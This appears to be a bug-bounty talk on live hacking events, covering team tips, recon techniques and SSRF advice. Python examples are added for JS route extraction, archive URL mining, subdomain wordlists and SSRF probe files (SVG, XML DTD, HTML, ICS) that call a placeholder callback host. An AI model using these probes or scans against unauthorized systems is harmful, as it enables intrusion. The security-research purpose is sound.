of MVH in Vegas! (Uber, Salesforce, Zenefits)
H1-514 2018: Winner of MVH in Montreal! (Shopify)
H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath)
H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath)
H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath)
H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber)
H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)
H1-202 2018: Winner Best bug in Washington (Mapbox)
H1-3120 2018: Winner Best bug in Amsterdam (Dropbox)
H1-514 2018: Winner Highest reputation in Montreal (Shopify)
"hacker-meets-dev face-to-face" bug bounty with special targets • First run by HackerOne in 2016 in Vegas • More companies run these nowadays: H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own as well
a walkthrough • Hangout, slides, presented by the company itself • Ability to ask questions 2. Often a bigger scope • Often *.company.com, *.company.dev, infrastructure, IPs • Open source repos by the company • Enterprise access to products • One time social engineering(!)
do recon • This is a VERY important part • One time only 48 hours for recon. Hard! • Slack instance shared with the company! 4. Some allow pre-submissions • Awesome! Less pressure on the final day • Faster payouts on event day
company • At HQ or at a hacking event (Defcon, Black Hat, Nullcon etc) • Discussions here == PRICELESS!! • Found valid bugs because I could discuss with the company: - This domain, what does it do? - Is this app supposed to work like this? - I noticed this weird behaviour, I think I can do this, what do you think?
early, shower and HACK • If no pre-submissions, get reports in! • Hacking day is special, sit in teams, collaboration(!) • Found many bugs on the actual day!
you have/know: • credentials needed • what domains are included, subdomains/acquisitions • what NOT to focus on (out-of-scope) • upgrades to enterprise accounts if promised
• put in "similar" effort to you • might know stuff you don't • helps you cover more target surface • you can communicate with and brainstorm Keep team small, 2-4. If 3 or more, effort will differ, so allow the payout split to differ as well. For 2 people, 50% each is always the simplest.
• Best bugs! Example: trying all integrations from a list of 80. Read the docs on how each one worked. Found a $20k bug due to one (1!!!) faulty implementation!
Desktop client • Web (API-paths in JS-files) • PHP/Java/Golang-SDKs • npm/composer/yarn Legacy versions of APIs? • Older versions working? • Are there docs? Web-archive?
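Pulling API paths out of JS files is mentioned above but not shown; the following is an added example (not from the deck or any tool it names) of how to do it offline. It runs a regex over a constructed, minified-looking JS fragment, normalizes template-literal placeholders, and expands every route into its parent prefixes so the result can be fed straight to Wfuzz. The sample JS and the `{param}` convention are assumptions made for the example.

```python
import re

# Constructed minified JS fragment standing in for a real target's bundle.
SAMPLE_JS = r'''
var API="/api/v2";function u(i){return fetch(API+"/users/"+i)}
axios.post("/api/v2/teams",d);$.get('/internal/health');
s.src="//cdn.example.com/a.js";var m="text/plain";
fetch(`/api/v2/orgs/${id}/members`);var x="/";var y="/api/v2/teams";
'''

# A quoted string literal (single, double or backtick quotes) that starts with "/".
QUOTED_PATH = re.compile(r"""["'`](/[^"'`\s]*)["'`]""")


def extract_paths(js):
    """Return the distinct URL paths that appear as string literals in JS source."""
    found = set()
    for m in QUOTED_PATH.finditer(js):
        path = m.group(1)
        if path == "/" or path.startswith("//"):  # bare root or protocol-relative URL
            continue
        # template literal placeholders such as ${id} become a generic {param} segment
        path = re.sub(r"\$\{[^}]*\}", "{param}", path)
        found.add(path)
    return sorted(found)


def directory_wordlist(paths):
    """Expand each path into all of its parent prefixes, one entry per line for Wfuzz."""
    dirs = set()
    for p in paths:
        segs = [s for s in p.split("/") if s]
        for i in range(1, len(segs) + 1):
            dirs.add("/" + "/".join(segs[:i]))
    return sorted(dirs)


if __name__ == "__main__":
    paths = extract_paths(SAMPLE_JS)
    print("\n".join(paths))
    print("---")
    print("\n".join(directory_wordlist(paths)))
```

Paths built by concatenation (`API+"/users/"`) come out as fragments like `/users/`; joining them to the right base is a manual step, which is exactly the kind of "boring" work that pays off at these events.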
Have integrations? (Slack, Trello, Zapier etc) • Allow integrations? (OAuth etc) • Public repos with examples? Company's Github repos • What software they use (Forks) • Synced with the original repo? (If not: find vulns by diffing against upstream)
Gists, Github, Google • "Internal indicators", search everywhere • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc • Any users in the organization? • Extract contributors from repos • Company name in users' repos: "user:xxx company-name" • Search Github Issues, funky stuff ends up there by accident! • Non-forked repos in the organization ‣ Package dependencies pulled from employees' personal repos? ‣ Is that employee still hired by the company? If not, that is a bad sign
Bugs might mean bugs in prod! • Might mean company made other companies vulnerable (really bad PR for the company) LEGACY • Content from web-archive, read old documentation(!!!) • URLs from web-archive's CDX-api, commoncrawl etc. • Test all URLs. Distinguish status-codes / bytes received (Wfuzz) • Anything interesting? Filter file-types, deduplicate
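The legacy-URL workflow above (pull URLs from the web archive's CDX API, drop static noise, deduplicate, re-request everything and separate the responses by status code and bytes received) can be scripted. The block below is an added example, not code from the deck; the CDX lines are constructed to match the Wayback CDX server's default field order (`urlkey timestamp original mimetype statuscode digest length`) and the probe results passed to `outliers` are made up. Parameter values are stripped during deduplication so `?id=1` and `?id=2` count as one endpoint, and the oldest capture is kept because that is where the forgotten documentation and API versions live.

```python
from collections import Counter
from urllib.parse import parse_qsl, urlsplit, urlunsplit

# Constructed sample in the Wayback CDX server's default output format
# (urlkey timestamp original mimetype statuscode digest length). Not real data.
SAMPLE_CDX = """\
com,example)/ 20150101000000 http://example.com/ text/html 200 AAAA 1234
com,example)/api/v1/users?id=1 20160101000000 http://example.com/api/v1/users?id=1 application/json 200 BBBB 512
com,example)/api/v1/users?id=2 20160102000000 http://example.com/api/v1/users?id=2 application/json 200 CCCC 513
com,example)/static/app.js 20170101000000 http://example.com/static/app.js application/javascript 200 DDDD 90000
com,example)/static/logo.png 20170101000000 http://example.com/static/logo.png image/png 200 EEEE 4000
com,example)/docs/api-v0.html 20140101000000 http://example.com/docs/api-v0.html text/html 200 FFFF 7000
com,example)/backup.sql 20130101000000 http://example.com/backup.sql application/sql 404 GGGG 0
"""

# Static assets that rarely deserve a manual look.
NOISE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".woff", ".woff2", ".ttf", ".css", ".ico")


def parse_cdx(text):
    """Parse default-format CDX lines into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        _urlkey, ts, url, mime, status, _digest, length = parts[:7]
        rows.append({"timestamp": ts, "url": url, "mime": mime,
                     "status": status, "length": int(length)})
    return rows


def normalize(url):
    """Keep parameter names but drop their values, so ?id=1 and ?id=2 map to one endpoint."""
    s = urlsplit(url)
    names = sorted({k for k, _ in parse_qsl(s.query, keep_blank_values=True)})
    query = "&".join(f"{k}=" for k in names)
    return urlunsplit((s.scheme, s.netloc.lower(), s.path, query, ""))


def candidate_urls(rows):
    """Drop static noise, deduplicate by normalized URL, keep the oldest capture of each."""
    kept = {}
    for r in rows:
        if urlsplit(r["url"]).path.lower().endswith(NOISE_EXT):
            continue
        key = normalize(r["url"])
        if key not in kept or r["timestamp"] < kept[key]["timestamp"]:
            kept[key] = r
    return sorted(kept.values(), key=lambda r: r["timestamp"])


def outliers(results):
    """results: (url, status, bytes) triples from re-requesting each candidate today.
    Hide the most common (status, bytes) class and return the rest, the same idea
    as wfuzz --hc/--hh, so the handful of odd responses stand out."""
    common = Counter((s, n) for _, s, n in results).most_common(1)[0][0]
    return [u for u, s, n in results if (s, n) != common]


if __name__ == "__main__":
    for r in candidate_urls(parse_cdx(SAMPLE_CDX)):
        print(r["timestamp"], r["status"], r["url"])
```

Responses whose length varies with the request (reflected URL, timestamps) need a tolerance on the byte count instead of exact equality; the exact match above is the simplest useful version.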
here we can't cover it all. These are general things • DNS: Subbrute, sublist3r etc. So many tools! ‣ Customized subbrute with 3rd party data ‣ Generate a DNS wordlist based on what you have already found • Existing routes from JS-files, Burp History • postMessage-tracker (logs all listener functions) • Wfuzz the target (use a VPN with switchable IP in case you get blocked) Best protip: Focus on BORING/HARD STUFF, other hackers won't
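"Generate a DNS wordlist based on findings" means mining the target's own naming vocabulary instead of only using a generic list. As an added example (not the deck's code or any named tool), the block below tokenizes already-discovered hostnames, strips trailing numbers, then produces numbered variants and pairwise combinations with the separators companies actually use, and removes hosts already known. The hostnames in `FOUND` and the small `EXTRA` seed list are constructed for the example.

```python
import re
from itertools import product

# Constructed hostnames "already found" for a made-up target; not a real company.
FOUND = ["api.example.com", "api-staging.example.com", "mail2.example.com",
         "jenkins.corp.example.com", "www.example.com"]

# Small generic seed list to combine with the target's own vocabulary (assumption).
EXTRA = ["dev", "test", "stage", "prod", "internal", "admin"]


def tokens(hosts, domain):
    """Split discovered labels on '.', '-' and '_' and strip trailing digits
    (mail2 -> mail) to recover the naming vocabulary the target actually uses."""
    toks = set()
    suffix = "." + domain
    for h in hosts:
        h = h.lower()
        if not h.endswith(suffix):
            continue
        for label in h[: -len(suffix)].split("."):
            for t in re.split(r"[-_]", label):
                t = re.sub(r"\d+$", "", t)
                if t:
                    toks.add(t)
    return sorted(toks)


def generate(hosts, domain, extra=EXTRA, max_num=3):
    """Candidate FQDNs built from the target's own tokens: numbered variants and
    pairwise combinations with '-', '' and '.' separators, in both orders.
    Already-known hosts are removed so only names still worth resolving remain."""
    base = tokens(hosts, domain)
    words = set(base) | set(extra)
    cands = set()
    for t in base:
        cands.add(t)
        for n in range(1, max_num + 1):
            cands.add(f"{t}{n}")
    for a, b in product(base, words):
        if a == b:
            continue
        for sep in ("-", "", "."):
            cands.add(f"{a}{sep}{b}")
            cands.add(f"{b}{sep}{a}")
    known = {h.lower() for h in hosts}
    return sorted(f"{c}.{domain}" for c in cands if f"{c}.{domain}" not in known)


if __name__ == "__main__":
    for fqdn in generate(FOUND, "example.com"):
        print(fqdn)
```

Feed the output to whatever resolver you use (the "customized subbrute" above), then re-run it on the new hits: every round adds tokens, so the list converges on the target's real naming scheme.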
Dir for target, TXT-file always open • Comments (snippets / indicators / urls) • Super helpful. Chaining bugs! - If an Open-Redirect, we can make a chain • Test-code, SDKs, screenshots in dir • Valid vulns in one place, separate from "interesting behaviour"
internal network (Both ipv4/ipv6) • Virtual hosts / kubernetes nodes are hard to reach, because they require a correct Host-header. Not all SSRFs send a proper Host-header (HTTP/1.0 requests, an external DNS name bound to an internal IP etc) • Different files, depending on the SSRF: MP3, ICS, XML, TXT, HTML, PNG, JPG, SVG etc. • Check if internal hosts can be reached without scanning the internal network. One company had flags in files, simple to prove you could access them.
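The "different files, depending on the SSRF" point is easier to apply with a generator that writes one probe per file format, each pointing at a callback URL that identifies the format that triggered it. The block below is an added example, not from the deck; the callback host is a placeholder for a listener you control (DNS or HTTP), the file types are the ones the deck lists that can carry a URL, and the ICS/SVG/XML/HTML bodies are the minimal standard constructs for each format. The ampersand is avoided in the callback query so the XML-based probes stay well-formed.

```python
import os
import xml.etree.ElementTree as ET

# Hypothetical callback URL; in practice a DNS/HTTP listener you control.
CALLBACK = "http://callback.example/probe"


def ssrf_probes(callback=CALLBACK, tag="t1"):
    """One file per parser type. Each embeds callback?t=<kind>-<tag>, so a hit in
    the listener log tells you which file format (and which upload) was fetched."""
    def u(kind):
        return f"{callback}?t={kind}-{tag}"  # no '&' so it is valid inside XML attributes

    return {
        # SVG: image renderers / thumbnailers follow xlink:href
        "probe.svg": (
            '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            f'<image xlink:href="{u("svg")}" width="1" height="1"/></svg>'
        ),
        # XML: external DTD reference, fetched by parsers that resolve the external subset
        "probe.xml": f'<?xml version="1.0"?><!DOCTYPE d SYSTEM "{u("xml")}"><d/>',
        # HTML: HTML-to-PDF / preview generators load <img>
        "probe.html": f'<html><body><img src="{u("html")}"></body></html>',
        # ICS: calendar importers may fetch ATTACH URIs
        "probe.ics": "\r\n".join([
            "BEGIN:VCALENDAR", "VERSION:2.0", "BEGIN:VEVENT", f"UID:{tag}",
            "DTSTART:20180101T000000Z", "SUMMARY:probe", f"ATTACH:{u('ics')}",
            "END:VEVENT", "END:VCALENDAR", "",
        ]),
    }


def is_wellformed_xml(body):
    """Sanity check for the XML-based probes before uploading them."""
    try:
        ET.fromstring(body)
        return True
    except ET.ParseError:
        return False


def write_probes(directory, **kw):
    """Write the probe files into `directory` and return their paths."""
    os.makedirs(directory, exist_ok=True)
    paths = []
    for name, body in ssrf_probes(**kw).items():
        path = os.path.join(directory, name)
        with open(path, "w", newline="") as f:
            f.write(body)
        paths.append(path)
    return paths


if __name__ == "__main__":
    for p in write_probes("probes", tag="upload1"):
        print(p)
```

Use a distinct `tag` per upload point; once the listener shows which format fires, switch the callback for an internal hostname or IP and remember the Host-header caveat above: a request to an IP will not reach a name-based virtual host.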